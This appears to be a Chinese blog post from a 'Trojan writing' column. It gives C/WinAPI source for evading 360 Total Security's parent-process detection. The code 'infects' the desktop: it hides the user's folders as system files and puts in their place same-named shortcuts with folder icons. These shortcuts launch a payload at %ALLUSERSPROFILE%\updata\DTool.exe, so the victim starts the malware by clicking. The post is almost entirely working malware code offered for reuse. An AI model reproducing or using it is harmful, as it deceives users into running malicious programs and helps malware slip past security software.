绕过360安全卫士的部分代码

最新推荐文章于 2021-08-22 00:10:01 发布

原创最新推荐文章于 2021-08-22 00:10:01 发布 · 7.9k 阅读

10 ·

CC 4.0 BY-SA版权

木马编写同时被 2 个专栏收录

86 篇文章

订阅专栏

C/SDK

52 篇文章

订阅专栏

本文记录了一种通过快捷方式启动程序来绕过360安全卫士父进程查杀的技巧，详细阐述了相关代码的使用和实施步骤。

利用快捷方式，由用户启动程序，进行绕过360父进程查杀，代码记录于此处，方便查阅

int bypass_360_startup()
{
	TCHAR str_desktop[256];
	LPITEMIDLIST pidl;
	SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl);//place the shortcut on the desktop
	SHGetPathFromIDList(pidl, str_desktop);

	if (if_need_infection(str_desktop)==0)//是否需要感染
	{
		OutputDebugStringA("bypass_360_startup if_need_infection return");
		return 0;
	}

	if (set_hide_directory(str_desktop)==0)//设置目录为隐藏属性
	{
		OutputDebugStringA("bypass_360_startup set_hide_directory return");
		return 0;
	}

	if (create_link(str_desktop)==0)//创建同名的快捷方式
	{
		OutputDebugStringA("bypass_360_startup create_link return");
		return 0;
	}

	return 0;
}


int if_need_infection(TCHAR str_disk[])
{
	OutputDebugStringA("if_need_infection fun:");
	CSearchFile file;

	file.SearchFile(_T("."),str_disk);

	for (DWORD i=0;i<file.MyVectorFile.size();i++)
	{
		OutputDebugString(file.MyVectorFile[i].szFilePath);
	}

	if (file.MyVectorFile.size()>0)
	{
		return 1;
	}

	return 0;
}


int set_hide_directory(TCHAR str_disk[])
{
	OutputDebugStringA("set_hide_directory fun:");
	CSearchFile file;

	file.SearchFile(_T("."),str_disk);

	for (DWORD i=0;i<file.MyVectorFile.size();i++)
	{
		SetFileAttributes(file.MyVectorFile[i].szFilePath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);//设置隐藏属性
		OutputDebugString(file.MyVectorFile[i].szFilePath);
	}

	return 1;
}

int create_link(TCHAR str_disk[])
{
	OutputDebugStringA("create_link fun:");
	CSearchFile file;

	file.SearchFile(_T("."),str_disk);

	for (DWORD i=0;i<file.MyVectorFile.size();i++)
	{
		TCHAR str_all_user_path[MAX_PATH]={0};
		TCHAR str_exe_path[MAX_PATH]={0};//DTool.exe的路径
		GetEnvironmentVariable(_T("ALLUSERSPROFILE"),str_all_user_path,MAX_PATH);
		_stprintf(str_exe_path,_T("%s\\updata\\DTool.exe"),str_all_user_path);

		TCHAR path_buffer[_MAX_PATH];  
		_stprintf(path_buffer,_T("%s.lnk"),file.MyVectorFile[i].szFilePath);
		//OutputDebugString(path_buffer);
		CreateLinkThenChangeIcon(str_exe_path,path_buffer);
	}

	return 1;

}

void CreateLinkThenChangeIcon(LPTSTR fname_to_create_link,
							  LPTSTR lnk_fname)
{
	CoInitialize(0);

	HRESULT hres;
	IShellLink *psl = NULL;
	IPersistFile *pPf = NULL;
	WCHAR wsz[256];
	TCHAR buf[256];
	int id;
	LPITEMIDLIST pidl;

	hres = CoCreateInstance(  CLSID_ShellLink,

		NULL,
		CLSCTX_INPROC_SERVER,
		IID_IShellLink,
		(LPVOID*)&psl);
	if(FAILED(hres))
		goto cleanup;
	hres = psl->QueryInterface(IID_IPersistFile, (LPVOID*)&pPf);
	if(FAILED(hres))
		goto cleanup;
	hres = psl->SetPath(fname_to_create_link);
	if(FAILED(hres))

		goto cleanup;
	//place the shortcut on the desktop

	SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl);//创建到桌面s

	SHGetPathFromIDList(pidl, buf);

	lstrcat(buf,_T("\\"));
	lstrcat(buf,lnk_fname);

#ifdef UNICODE
	hres = pPf->Save(buf, TRUE);
#else
	MultiByteToWideChar(CP_ACP, 0, lnk_fname, -1, wsz, MAX_PATH);//这里lnk_fname给的是全路径
	hres = pPf->Save(wsz, TRUE);
#endif

	if(FAILED(hres))

		goto cleanup;

	GetSystemDirectory(buf, 256);

	lstrcat(buf,_T("\\shell32.dll"));

	hres = psl->SetIconLocation(buf, 3);//15在shell32.dll中是我的电脑图标,220为IE图标,3为文件夹

	if(FAILED(hres))

		goto cleanup;

	hres = psl->GetIconLocation(buf, 256, &id);

	if(FAILED(hres))

		goto cleanup;

	pPf->Save(wsz, TRUE);

cleanup:

	if(pPf)

		pPf->Release();

	if(psl)

		psl->Release();

	CoUninitialize();
}